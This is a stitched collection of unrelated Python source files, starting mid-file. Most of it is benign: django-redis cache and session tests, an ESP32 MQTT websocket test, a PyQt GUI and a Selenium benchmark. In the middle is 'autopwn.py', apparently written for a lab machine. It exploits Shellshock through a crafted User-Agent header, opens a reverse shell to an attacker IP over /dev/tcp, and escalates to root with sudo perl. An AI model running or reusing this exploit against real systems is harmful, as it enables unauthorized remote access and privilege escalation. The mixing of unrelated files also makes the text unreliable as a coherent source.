self.assertEqual(res, 2)
self.cache.incr("num", 10)
res = self.cache.get("num")
self.assertEqual(res, 12)
# max 64 bit signed int
self.cache.set("num", 9223372036854775807)
self.cache.incr("num")
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775808)
self.cache.incr("num", 2)
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775810)
self.cache.set("num", 3)
self.cache.incr("num", 2)
res = self.cache.get("num")
self.assertEqual(res, 5)
def test_incr_error(self):
if isinstance(self.cache.client, herd.HerdClient):
self.skipTest("HerdClient doesn't support incr")
with self.assertRaises(ValueError):
# key does not exist
self.cache.incr("numnum")
def test_incr_ignore_check(self):
if isinstance(self.cache.client, ShardClient):
self.skipTest(
"ShardClient doesn't support argument ignore_key_check to incr"
)
if isinstance(self.cache.client, herd.HerdClient):
self.skipTest("HerdClient doesn't support incr")
# key exists check will be skipped and the value will be incremented by
# '1' which is the default delta
self.cache.incr("num", ignore_key_check=True)
res = self.cache.get("num")
self.assertEqual(res, 1)
self.cache.delete("num")
# since the key doesn't exist, it is set to the delta value, 10 in this case
self.cache.incr("num", 10, ignore_key_check=True)
res = self.cache.get("num")
self.assertEqual(res, 10)
self.cache.delete("num")
# the following are regression checks to make sure incr still works as
# expected with the max 64-bit signed int
self.cache.set("num", 9223372036854775807)
self.cache.incr("num", ignore_key_check=True)
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775808)
self.cache.incr("num", 2, ignore_key_check=True)
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775810)
self.cache.set("num", 3)
self.cache.incr("num", 2, ignore_key_check=True)
res = self.cache.get("num")
self.assertEqual(res, 5)
def test_get_set_bool(self):
self.cache.set("bool", True)
res = self.cache.get("bool")
self.assertIsInstance(res, bool)
self.assertIs(res, True)
self.cache.set("bool", False)
res = self.cache.get("bool")
self.assertIsInstance(res, bool)
self.assertIs(res, False)
def test_decr(self):
if isinstance(self.cache.client, herd.HerdClient):
self.skipTest("HerdClient doesn't support decr")
self.cache.set("num", 20)
self.cache.decr("num")
res = self.cache.get("num")
self.assertEqual(res, 19)
self.cache.decr("num", 20)
res = self.cache.get("num")
self.assertEqual(res, -1)
self.cache.decr("num", 2)
res = self.cache.get("num")
self.assertEqual(res, -3)
self.cache.set("num", 20)
self.cache.decr("num")
res = self.cache.get("num")
self.assertEqual(res, 19)
# max 64 bit signed int + 1
self.cache.set("num", 9223372036854775808)
self.cache.decr("num")
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775807)
self.cache.decr("num", 2)
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775805)
def test_version(self):
self.cache.set("keytest", 2, version=2)
res = self.cache.get("keytest")
self.assertIsNone(res)
res = self.cache.get("keytest", version=2)
self.assertEqual(res, 2)
def test_incr_version(self):
self.cache.set("keytest", 2)
self.cache.incr_version("keytest")
res = self.cache.get("keytest")
self.assertIsNone(res)
res = self.cache.get("keytest", version=2)
self.assertEqual(res, 2)
def test_delete_pattern(self):
for key in ["foo-aa", "foo-ab", "foo-bb", "foo-bc"]:
self.cache.set(key, "foo")
res = self.cache.delete_pattern("*foo-a*")
self.assertTrue(bool(res))
keys = self.cache.keys("foo*")
self.assertEqual(set(keys), {"foo-bb", "foo-bc"})
res = self.cache.delete_pattern("*foo-a*")
self.assertFalse(bool(res))
@patch("django_redis.cache.RedisCache.client")
def test_delete_pattern_with_custom_count(self, client_mock):
for key in ["foo-aa", "foo-ab", "foo-bb", "foo-bc"]:
self.cache.set(key, "foo")
self.cache.delete_pattern("*foo-a*", itersize=2)
client_mock.delete_pattern.assert_called_once_with("*foo-a*", itersize=2)
@patch("django_redis.cache.RedisCache.client")
def test_delete_pattern_with_settings_default_scan_count(self, client_mock):
for key in ["foo-aa", "foo-ab", "foo-bb", "foo-bc"]:
self.cache.set(key, "foo")
expected_count = django_redis.cache.DJANGO_REDIS_SCAN_ITERSIZE
self.cache.delete_pattern("*foo-a*")
client_mock.delete_pattern.assert_called_once_with(
"*foo-a*", itersize=expected_count
)
def test_close(self):
cache = caches["default"]
cache.set("f", "1")
cache.close()
def test_ttl(self):
cache = caches["default"]
# Test ttl
cache.set("foo", "bar", 10)
ttl = cache.ttl("foo")
if isinstance(cache.client, herd.HerdClient):
self.assertAlmostEqual(ttl, 12)
else:
self.assertAlmostEqual(ttl, 10)
# Test ttl None
cache.set("foo", "foo", timeout=None)
ttl = cache.ttl("foo")
self.assertIsNone(ttl)
# Test ttl with expired key
cache.set("foo", "foo", timeout=-1)
ttl = cache.ttl("foo")
self.assertEqual(ttl, 0)
# Test ttl with not existent key
ttl = cache.ttl("not-existent-key")
self.assertEqual(ttl, 0)
def test_persist(self):
self.cache.set("foo", "bar", timeout=20)
self.cache.persist("foo")
ttl = self.cache.ttl("foo")
self.assertIsNone(ttl)
def test_expire(self):
self.cache.set("foo", "bar", timeout=None)
self.cache.expire("foo", 20)
ttl = self.cache.ttl("foo")
self.assertAlmostEqual(ttl, 20)
def test_lock(self):
lock = self.cache.lock("foobar")
lock.acquire(blocking=True)
self.assertTrue(self.cache.has_key("foobar"))
lock.release()
self.assertFalse(self.cache.has_key("foobar"))
def test_lock_released_by_thread(self):
lock = self.cache.lock("foobar", thread_local=False)
lock.acquire(blocking=True)
def release_lock(lock_):
lock_.release()
t = threading.Thread(target=release_lock, args=[lock])
t.start()
t.join()
self.assertFalse(self.cache.has_key("foobar"))
def test_iter_keys(self):
cache = caches["default"]
if isinstance(cache.client, ShardClient):
self.skipTest("ShardClient doesn't support iter_keys")
cache.set("foo1", 1)
cache.set("foo2", 1)
cache.set("foo3", 1)
# Test simple result
result = set(cache.iter_keys("foo*"))
self.assertEqual(result, {"foo1", "foo2", "foo3"})
# Test limited result
result = list(cache.iter_keys("foo*", itersize=2))
self.assertEqual(len(result), 3)
# Test generator object
result = cache.iter_keys("foo*")
self.assertNotEqual(next(result), None)
def test_master_slave_switching(self):
if isinstance(self.cache.client, ShardClient):
self.skipTest("ShardClient doesn't support get_client")
cache = caches["sample"]
client = cache.client
client._server = ["foo", "bar"]
client._clients = ["Foo", "Bar"]
self.assertEqual(client.get_client(write=True), "Foo")
self.assertEqual(client.get_client(write=False), "Bar")
def test_touch_zero_timeout(self):
self.cache.set("test_key", 222, timeout=10)
self.assertIs(self.cache.touch("test_key", 0), True)
res = self.cache.get("test_key")
self.assertIsNone(res)
def test_touch_positive_timeout(self):
self.cache.set("test_key", 222, timeout=10)
self.assertIs(self.cache.touch("test_key", 2), True)
self.assertEqual(self.cache.get("test_key"), 222)
time.sleep(3)
self.assertIsNone(self.cache.get("test_key"))
def test_touch_negative_timeout(self):
self.cache.set("test_key", 222, timeout=10)
self.assertIs(self.cache.touch("test_key", -1), True)
res = self.cache.get("test_key")
self.assertIsNone(res)
def test_touch_missed_key(self):
self.assertIs(self.cache.touch("test_key_does_not_exist", 1), False)
def test_touch_forever(self):
self.cache.set("test_key", "foo", timeout=1)
result = self.cache.touch("test_key", None)
self.assertIs(result, True)
self.assertIsNone(self.cache.ttl("test_key"))
time.sleep(2)
self.assertEqual(self.cache.get("test_key"), "foo")
def test_touch_forever_nonexistent(self):
result = self.cache.touch("test_key_does_not_exist", None)
self.assertIs(result, False)
def test_touch_default_timeout(self):
self.cache.set("test_key", "foo", timeout=1)
result = self.cache.touch("test_key")
self.assertIs(result, True)
time.sleep(2)
self.assertEqual(self.cache.get("test_key"), "foo")
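# The three DjangoOmitExceptions* test cases below check how the global
# DJANGO_REDIS_IGNORE_EXCEPTIONS setting and the per-cache IGNORE_EXCEPTIONS
# option combine to decide whether connection errors are swallowed or raised.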
class DjangoOmitExceptionsTests(unittest.TestCase):
def setUp(self):
self._orig_setting = django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = True
caches_setting = copy.deepcopy(settings.CACHES)
caches_setting["doesnotexist"]["OPTIONS"]["IGNORE_EXCEPTIONS"] = True
cm = override_settings(CACHES=caches_setting)
cm.enable()
self.addCleanup(cm.disable)
self.cache = caches["doesnotexist"]
def tearDown(self):
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = self._orig_setting
def test_get_many_returns_default_arg(self):
self.assertIs(self.cache._ignore_exceptions, True)
self.assertEqual(self.cache.get_many(["key1", "key2", "key3"]), {})
def test_get(self):
self.assertIs(self.cache._ignore_exceptions, True)
self.assertIsNone(self.cache.get("key"))
self.assertEqual(self.cache.get("key", "default"), "default")
self.assertEqual(self.cache.get("key", default="default"), "default")
class DjangoOmitExceptionsPriority1Tests(unittest.TestCase):
def setUp(self):
self._orig_setting = django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = False
caches_setting = copy.deepcopy(settings.CACHES)
caches_setting["doesnotexist"]["OPTIONS"]["IGNORE_EXCEPTIONS"] = True
cm = override_settings(CACHES=caches_setting)
cm.enable()
self.addCleanup(cm.disable)
self.cache = caches["doesnotexist"]
def tearDown(self):
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = self._orig_setting
def test_get(self):
self.assertIs(self.cache._ignore_exceptions, True)
self.assertIsNone(self.cache.get("key"))
class DjangoOmitExceptionsPriority2Tests(unittest.TestCase):
def setUp(self):
self._orig_setting = django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = True
caches_setting = copy.deepcopy(settings.CACHES)
caches_setting["doesnotexist"]["OPTIONS"]["IGNORE_EXCEPTIONS"] = False
cm = override_settings(CACHES=caches_setting)
cm.enable()
self.addCleanup(cm.disable)
self.cache = caches["doesnotexist"]
def tearDown(self):
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = self._orig_setting
def test_get(self):
self.assertIs(self.cache._ignore_exceptions, False)
with self.assertRaises(ConnectionError):
self.cache.get("key")
# Copied from Django's sessions test suite. Keep in sync with upstream.
# https://github.com/django/django/blob/master/tests/sessions_tests/tests.py
class SessionTestsMixin:
# This does not inherit from TestCase to avoid any tests being run with this
# class, which wouldn't work, and to allow different TestCase subclasses to
# be used.
backend = None # subclasses must specify
def setUp(self):
self.session = self.backend()
def tearDown(self):
# NB: be careful to delete any sessions created; stale sessions fill up
# the /tmp (with some backends) and eventually overwhelm it after lots
# of runs (think buildbots)
self.session.delete()
def test_new_session(self):
self.assertIs(self.session.modified, False)
self.assertIs(self.session.accessed, False)
def test_get_empty(self):
self.assertIsNone(self.session.get("cat"))
def test_store(self):
self.session["cat"] = "dog"
self.assertIs(self.session.modified, True)
self.assertEqual(self.session.pop("cat"), "dog")
def test_pop(self):
self.session["some key"] = "exists"
# Need to reset these to pretend we haven't accessed it:
self.accessed = False
self.modified = False
self.assertEqual(self.session.pop("some key"), "exists")
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, True)
self.assertIsNone(self.session.get("some key"))
def test_pop_default(self):
self.assertEqual(
self.session.pop("some key", "does not exist"), "does not exist"
)
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_pop_default_named_argument(self):
self.assertEqual(
self.session.pop("some key", default="does not exist"), "does not exist"
)
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_pop_no_default_keyerror_raised(self):
with self.assertRaises(KeyError):
self.session.pop("some key")
def test_setdefault(self):
self.assertEqual(self.session.setdefault("foo", "bar"), "bar")
self.assertEqual(self.session.setdefault("foo", "baz"), "bar")
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, True)
def test_update(self):
self.session.update({"update key": 1})
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, True)
self.assertEqual(self.session.get("update key"), 1)
def test_has_key(self):
self.session["some key"] = 1
self.session.modified = False
self.session.accessed = False
self.assertIn("some key", self.session)
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_values(self):
self.assertEqual(list(self.session.values()), [])
self.assertIs(self.session.accessed, True)
self.session["some key"] = 1
self.session.modified = False
self.session.accessed = False
self.assertEqual(list(self.session.values()), [1])
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_keys(self):
self.session["x"] = 1
self.session.modified = False
self.session.accessed = False
self.assertEqual(list(self.session.keys()), ["x"])
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_items(self):
self.session["x"] = 1
self.session.modified = False
self.session.accessed = False
self.assertEqual(list(self.session.items()), [("x", 1)])
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_clear(self):
self.session["x"] = 1
self.session.modified = False
self.session.accessed = False
self.assertEqual(list(self.session.items()), [("x", 1)])
self.session.clear()
self.assertEqual(list(self.session.items()), [])
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, True)
def test_save(self):
self.session.save()
self.assertIs(self.session.exists(self.session.session_key), True)
def test_delete(self):
self.session.save()
self.session.delete(self.session.session_key)
self.assertIs(self.session.exists(self.session.session_key), False)
def test_flush(self):
self.session["foo"] = "bar"
self.session.save()
prev_key = self.session.session_key
self.session.flush()
self.assertIs(self.session.exists(prev_key), False)
self.assertNotEqual(self.session.session_key, prev_key)
self.assertIsNone(self.session.session_key)
self.assertIs(self.session.modified, True)
self.assertIs(self.session.accessed, True)
def test_cycle(self):
self.session["a"], self.session["b"] = "c", "d"
self.session.save()
prev_key = self.session.session_key
prev_data = list(self.session.items())
self.session.cycle_key()
self.assertIs(self.session.exists(prev_key), False)
self.assertNotEqual(self.session.session_key, prev_key)
self.assertEqual(list(self.session.items()), prev_data)
def test_cycle_with_no_session_cache(self):
self.session["a"], self.session["b"] = "c", "d"
self.session.save()
prev_data = self.session.items()
self.session = self.backend(self.session.session_key)
self.assertIs(hasattr(self.session, "_session_cache"), False)
self.session.cycle_key()
self.assertCountEqual(self.session.items(), prev_data)
def test_save_doesnt_clear_data(self):
self.session["a"] = "b"
self.session.save()
self.assertEqual(self.session["a"], "b")
def test_invalid_key(self):
# Submitting an invalid session key (either by guessing, or if the db has
# removed the key) results in a new key being generated.
try:
session = self.backend("1")
session.save()
self.assertNotEqual(session.session_key, "1")
self.assertIsNone(session.get("cat"))
session.delete()
finally:
# Some backends leave a stale cache entry for the invalid
# session key; make sure that entry is manually deleted
session.delete("1")
def test_session_key_empty_string_invalid(self):
"""Falsey values (Such as an empty string) are rejected."""
self.session._session_key = ""
self.assertIsNone(self.session.session_key)
def test_session_key_too_short_invalid(self):
"""Strings shorter than 8 characters are rejected."""
self.session._session_key = "1234567"
self.assertIsNone(self.session.session_key)
def test_session_key_valid_string_saved(self):
"""Strings of length 8 and up are accepted and stored."""
self.session._session_key = "12345678"
self.assertEqual(self.session.session_key, "12345678")
def test_session_key_is_read_only(self):
def set_session_key(session):
session.session_key = session._get_new_session_key()
with self.assertRaises(AttributeError):
set_session_key(self.session)
# Custom session expiry
def test_default_expiry(self):
# A normal session has a max age equal to settings
self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
# So does a custom session with an idle expiration time of 0 (but it'll
# expire at browser close)
self.session.set_expiry(0)
self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
def test_custom_expiry_seconds(self):
modification = timezone.now()
self.session.set_expiry(10)
date = self.session.get_expiry_date(modification=modification)
self.assertEqual(date, modification + timedelta(seconds=10))
age = self.session.get_expiry_age(modification=modification)
self.assertEqual(age, 10)
def test_custom_expiry_timedelta(self):
modification = timezone.now()
# Mock timezone.now, because set_expiry calls it on this code path.
original_now = timezone.now
try:
timezone.now = lambda: modification
self.session.set_expiry(timedelta(seconds=10))
finally:
timezone.now = original_now
date = self.session.get_expiry_date(modification=modification)
self.assertEqual(date, modification + timedelta(seconds=10))
age = self.session.get_expiry_age(modification=modification)
self.assertEqual(age, 10)
def test_custom_expiry_datetime(self):
modification = timezone.now()
self.session.set_expiry(modification + timedelta(seconds=10))
date = self.session.get_expiry_date(modification=modification)
self.assertEqual(date, modification + timedelta(seconds=10))
age = self.session.get_expiry_age(modification=modification)
self.assertEqual(age, 10)
def test_custom_expiry_reset(self):
self.session.set_expiry(None)
self.session.set_expiry(10)
self.session.set_expiry(None)
self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
def test_get_expire_at_browser_close(self):
# Tests get_expire_at_browser_close with different settings and different
# set_expiry calls
with override_settings(SESSION_EXPIRE_AT_BROWSER_CLOSE=False):
self.session.set_expiry(10)
self.assertIs(self.session.get_expire_at_browser_close(), False)
self.session.set_expiry(0)
self.assertIs(self.session.get_expire_at_browser_close(), True)
self.session.set_expiry(None)
self.assertIs(self.session.get_expire_at_browser_close(), False)
with override_settings(SESSION_EXPIRE_AT_BROWSER_CLOSE=True):
self.session.set_expiry(10)
self.assertIs(self.session.get_expire_at_browser_close(), False)
self.session.set_expiry(0)
self.assertIs(self.session.get_expire_at_browser_close(), True)
self.session.set_expiry(None)
self.assertIs(self.session.get_expire_at_browser_close(), True)
def test_decode(self):
# Ensure we can decode what we encode
data = {"a test key": "a test value"}
encoded = self.session.encode(data)
self.assertEqual(self.session.decode(encoded), data)
def test_decode_failure_logged_to_security(self):
bad_encode = base64.b64encode(b"flaskdj:alkdjf").decode("ascii")
with self.assertLogs("django.security.SuspiciousSession", "WARNING") as cm:
self.assertEqual({}, self.session.decode(bad_encode))
# The failed decode is logged.
self.assertIn("corrupted", cm.output[0])
def test_actual_expiry(self):
# this doesn't work with JSONSerializer (serializing timedelta)
with override_settings(
SESSION_SERIALIZER="django.contrib.sessions.serializers.PickleSerializer"
):
self.session = self.backend() # reinitialize after overriding settings
# Regression test for #19200
old_session_key = None
new_session_key = None
try:
self.session["foo"] = "bar"
self.session.set_expiry(-timedelta(seconds=10))
self.session.save()
old_session_key = self.session.session_key
# With an expiry date in the past, the session expires instantly.
new_session = self.backend(self.session.session_key)
new_session_key = new_session.session_key
self.assertNotIn("foo", new_session)
finally:
self.session.delete(old_session_key)
self.session.delete(new_session_key)
@unittest.skipIf(VERSION < (2, 0), "Requires Django 2.0+")
def test_session_load_does_not_create_record(self):
"""
Loading an unknown session key does not create a session record.
Creating session records on load is a DOS vulnerability.
"""
session = self.backend("someunknownkey")
session.load()
self.assertIsNone(session.session_key)
self.assertIs(session.exists(session.session_key), False)
# provided unknown key was cycled, not reused
self.assertNotEqual(session.session_key, "someunknownkey")
def test_session_save_does_not_resurrect_session_logged_out_in_other_context(self):
"""
Sessions shouldn't be resurrected by a concurrent request.
"""
from django.contrib.sessions.backends.base import UpdateError
# Create new session.
s1 = self.backend()
s1["test_data"] = "value1"
s1.save(must_create=True)
# Logout in another context.
s2 = self.backend(s1.session_key)
s2.delete()
# Modify session in first context.
s1["test_data"] = "value2"
with self.assertRaises(UpdateError):
# This should throw an exception as the session is deleted, not
# resurrect the session.
s1.save()
self.assertEqual(s1.load(), {})
class SessionTests(SessionTestsMixin, unittest.TestCase):
backend = CacheSession
def test_actual_expiry(self):
if isinstance(
caches[DEFAULT_CACHE_ALIAS].client._serializer, MSGPackSerializer
):
self.skipTest("msgpack serializer doesn't support datetime serialization")
super().test_actual_expiry()
class TestDefaultClient(unittest.TestCase):
@patch("test_backend.DefaultClient.get_client")
@patch("test_backend.DefaultClient.__init__", return_value=None)
def test_delete_pattern_calls_get_client_given_no_client(
self, init_mock, get_client_mock
):
client = DefaultClient()
client._backend = Mock()
client._backend.key_prefix = ""
client.delete_pattern(pattern="foo*")
get_client_mock.assert_called_once_with(write=True)
@patch("test_backend.DefaultClient.make_pattern")
@patch("test_backend.DefaultClient.get_client", return_value=Mock())
@patch("test_backend.DefaultClient.__init__", return_value=None)
def test_delete_pattern_calls_make_pattern(
self, init_mock, get_client_mock, make_pattern_mock
):
client = DefaultClient()
client._backend = Mock()
client._backend.key_prefix = ""
get_client_mock.return_value.scan_iter.return_value = []
client.delete_pattern(pattern="foo*")
kwargs = {"version": None, "prefix": None}
# if not isinstance(caches['default'].client, ShardClient):
# kwargs['prefix'] = None
make_pattern_mock.assert_called_once_with("foo*", **kwargs)
@patch("test_backend.DefaultClient.make_pattern")
@patch("test_backend.DefaultClient.get_client", return_value=Mock())
@patch("test_backend.DefaultClient.__init__", return_value=None)
def test_delete_pattern_calls_scan_iter_with_count_if_itersize_given(
self, init_mock, get_client_mock, make_pattern_mock
):
client = DefaultClient()
client._backend = Mock()
client._backend.key_prefix = ""
get_client_mock.return_value.scan_iter.return_value = []
client.delete_pattern(pattern="foo*", itersize=90210)
get_client_mock.return_value.scan_iter.assert_called_once_with(
count=90210, match=make_pattern_mock.return_value
)
class TestShardClient(unittest.TestCase):
@patch("test_backend.DefaultClient.make_pattern")
@patch("test_backend.ShardClient.__init__", return_value=None)
def test_delete_pattern_calls_scan_iter_with_count_if_itersize_given(
self, init_mock, make_pattern_mock
):
client = ShardClient()
client._backend = Mock()
client._backend.key_prefix = ""
connection = Mock()
connection.scan_iter.return_value = []
client._serverdict = {"test": connection}
client.delete_pattern(pattern="foo*", itersize=10)
connection.scan_iter.assert_called_once_with(
count=10, match=make_pattern_mock.return_value
)
@patch("test_backend.DefaultClient.make_pattern")
@patch("test_backend.ShardClient.__init__", return_value=None)
def test_delete_pattern_calls_scan_iter(self, init_mock, make_pattern_mock):
client = ShardClient()
client._backend = Mock()
client._backend.key_prefix = ""
connection = Mock()
connection.scan_iter.return_value = []
client._serverdict = {"test": connection}
client.delete_pattern(pattern="foo*")
connection.scan_iter.assert_called_once_with(
match=make_pattern_mock.return_value
)
@patch("test_backend.DefaultClient.make_pattern")
@patch("test_backend.ShardClient.__init__", return_value=None)
def test_delete_pattern_calls_delete_for_given_keys(
self, init_mock, make_pattern_mock
):
client = ShardClient()
client._backend = Mock()
client._backend.key_prefix = ""
connection = Mock()
connection.scan_iter.return_value = [Mock(), Mock()]
connection.delete.return_value = 0
client._serverdict = {"test": connection}
client.delete_pattern(pattern="foo*")
connection.delete.assert_called_once_with(*connection.scan_iter.return_value)
|
autopwn.py
|
#!/usr/bin/python3
#coding: utf-8
#----------------------------------------------------------
#Made by: WizzzStark
#Remember to change your attacker IP in request function.
#-----------------------------------------------------------
import requests
import pdb
import threading
import signal
import sys
import time
import os
from pwn import *
ip_maquina='10.10.10.56'
lport = 1234
def exit(sig, frame):
print("\n [!] Saliendo...\n")
sys.exit(1)
signal.signal(signal.SIGINT, exit)
def request():
os.system("curl -H \"user-agent: () { :; }; echo;echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.15.122/1234 0>&1'\" http://10.10.10.56/cgi-bin/user.sh ")
if __name__=='__main__':
try:
threading.Thread(target=request, args=()).start()
    except Exception as e:
log.error(str(e))
    p1 = log.progress("Access")
    p1.status("Gaining access to the system")
shell = listen(lport, timeout=10).wait_for_connection()
if shell.sock is None:
p1.failure("No ha sido posible ganar acceso al sistema")
sys.exit(1)
else:
p1.success("Se ha ganado acceso con exito")
p2 = log.progress("Privilege Escalation")
p2.status("Migrando al usuario root")
shell.sendline("sudo /usr/bin/perl -e 'exec \"/bin/sh\"'")
p2.success("Se migró al usuario root correctamente")
shell.interactive()
|
mqtt_ws_example_test.py
|
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
import re
import os
import sys
import paho.mqtt.client as mqtt
from threading import Thread, Event
try:
import IDF
except Exception:
    # this is a test case written with tiny-test-fw.
    # to run test cases outside tiny-test-fw,
    # we need to set the environment variable `TEST_FW_PATH`,
    # then insert `TEST_FW_PATH` into sys.path before importing the FW module
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
event_client_connected = Event()
event_stop_client = Event()
event_client_received_correct = Event()
message_log = ""
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
event_client_connected.set()
client.subscribe("/topic/qos0")
def mqtt_client_task(client):
while not event_stop_client.is_set():
client.loop()
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
global message_log
payload = msg.payload.decode()
if not event_client_received_correct.is_set() and payload == "data":
client.publish("/topic/qos0", "data_to_esp32")
if msg.topic == "/topic/qos0" and payload == "data":
event_client_received_correct.set()
message_log += "Received data:" + msg.topic + " " + payload + "\n"
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_ws(env, extra_data):
broker_url = ""
broker_port = 0
"""
steps: |
1. join AP and connects to ws broker
2. Test connects a client to the same broker
3. Test evaluates it received correct qos0 message
4. Test ESP32 client received correct qos0 message
"""
dut1 = env.get_dut("mqtt_websocket", "examples/protocols/mqtt/ws")
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mqtt_websocket.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("mqtt_websocket_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("mqtt_websocket_size", bin_size // 1024)
# Look for host:port in sdkconfig
try:
value = re.search(r'\:\/\/([^:]+)\:([0-9]+)', dut1.app.get_sdkconfig()["CONFIG_BROKER_URI"])
broker_url = value.group(1)
broker_port = int(value.group(2))
except Exception:
print('ENV_TEST_FAILURE: Cannot find broker url in sdkconfig')
raise
client = None
# 1. Test connects to a broker
try:
client = mqtt.Client(transport="websockets")
client.on_connect = on_connect
client.on_message = on_message
client.ws_set_options(path="/ws", headers=None)
print("Connecting...")
client.connect(broker_url, broker_port, 60)
except Exception:
print("ENV_TEST_FAILURE: Unexpected error while connecting to broker {}: {}:".format(broker_url, sys.exc_info()[0]))
raise
# Starting a py-client in a separate thread
thread1 = Thread(target=mqtt_client_task, args=(client,))
thread1.start()
try:
print("Connecting py-client to broker {}:{}...".format(broker_url, broker_port))
if not event_client_connected.wait(timeout=30):
raise ValueError("ENV_TEST_FAILURE: Test script cannot connect to broker: {}".format(broker_url))
dut1.start_app()
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
print('ENV_TEST_FAILURE: Cannot connect to AP')
raise
print("Checking py-client received msg published from esp...")
if not event_client_received_correct.wait(timeout=30):
raise ValueError('Wrong data received, msg log: {}'.format(message_log))
print("Checking esp-client received msg published from py-client...")
dut1.expect(re.compile(r"DATA=data_to_esp32"), timeout=30)
finally:
event_stop_client.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mqtt_ws()
|
mbl_gui_window.py
|
import time
from PyQt5.QtCore import QTimer, pyqtSignal
from PyQt5.QtGui import QPixmap, QFont
from PyQt5.QtWidgets import QMainWindow, QDialog, QApplication, QLabel
from lsl.mbl_lsl_receiver import MBL_LSLReceiver
from visuals.gui import Ui_MainWindow
from threading import Thread
class MBL_GuiWindow(QMainWindow):
def __init__(self, parent=None):
super().__init__(parent)
self.thread = None
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.connect_signals_slots()
self.receiver = MBL_LSLReceiver()
self.receiver.start()
self.last_time = time.time()
# Hide GUI
self.ui.VisualsBox.setEnabled(False)
self.ui.SettingsBox.setEnabled(False)
# prepare score label
self.score = 0
self.ui.score_value.setText(str(self.score))
self.ui.score_value.setStyleSheet('color: #ffffff')
self.ui.score_value.setFont(QFont('MS Shell Dlg 2', 16))
# creating signals
self.signalUpdateScore = pyqtSignal()
# creating label
self.head_label_a = QLabel(self)
self.head_label_b = QLabel(self)
# loading images
self.pixmap_a = QPixmap('res\\headA_resized.png')
self.pixmap_b = QPixmap('res\\headB_resized.png')
# adding images to labels
self.head_label_a.setPixmap(self.pixmap_a)
self.head_label_b.setPixmap(self.pixmap_b)
# Optional, resize label to image size and remove background
self.head_label_a.resize(self.pixmap_a.width(), self.pixmap_a.height())
self.head_label_b.resize(self.pixmap_b.width(), self.pixmap_b.height())
self.head_label_a.setStyleSheet("background-color: rgba(255, 255, 255, 0)")
self.head_label_b.setStyleSheet("background-color: rgba(255, 255, 255, 0)")
self.head_label_a.move(300, 200)
self.head_label_b.move(800, 200)
# Update the interface every 0.5 seconds
# make QTimer
self.qTimer = QTimer()
        # set interval to 0.5 s
        self.qTimer.setInterval(500)  # 500 ms = 0.5 s
# connect timeout signal to signal handler
self.qTimer.timeout.connect(self.update_head_position)
# start timer
self.qTimer.start()
def connect_signals_slots(self):
print("No signals implemented yet") # implement action connections
def show_gui_threaded(self):
        # pass the method itself (the original called it immediately) and start the thread
        self.thread = Thread(target=self.show)
        self.thread.start()
def stop_gui_thread(self):
self.thread.join()
def update_head_position(self):
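        # Move both head images toward each other at a speed proportional to the
        # receiver's correlation score; award a point once the score exceeds 0.9.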
delta_time = time.time() - self.last_time
step = 450 * self.receiver.correlation_score * delta_time
self.head_label_a.move(300 + step, 200)
self.head_label_b.move(800 - step, 200)
self.last_time = time.time()
if self.receiver.correlation_score > 0.9:
self.score += 1
self.ui.score_value.setText(str(self.score))
def reset_head_position(self):
self.head_label_a.move(300, 200)
self.head_label_b.move(800, 200)
|
chrome_driver_manage_benchmark.py
|
# coding=utf-8
from threading import Thread, Semaphore
from collections import deque
from selenium.webdriver import Chrome, ChromeOptions
from benchmarks.utils import log_time
TEST_URL = 'https://www.baidu.com/'
def make_chrome_options():
chrome_options = ChromeOptions()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--incognito')
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--ignore-ssl-errors')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--no-sandbox')
prefs = {'profile.managed_default_content_settings.images': 2}
chrome_options.add_experimental_option('prefs', prefs)
return chrome_options
def create_chrome_driver():
driver = Chrome(options=make_chrome_options())
driver.set_page_load_timeout(10)
driver.set_script_timeout(10)
driver.implicitly_wait(10)
return driver
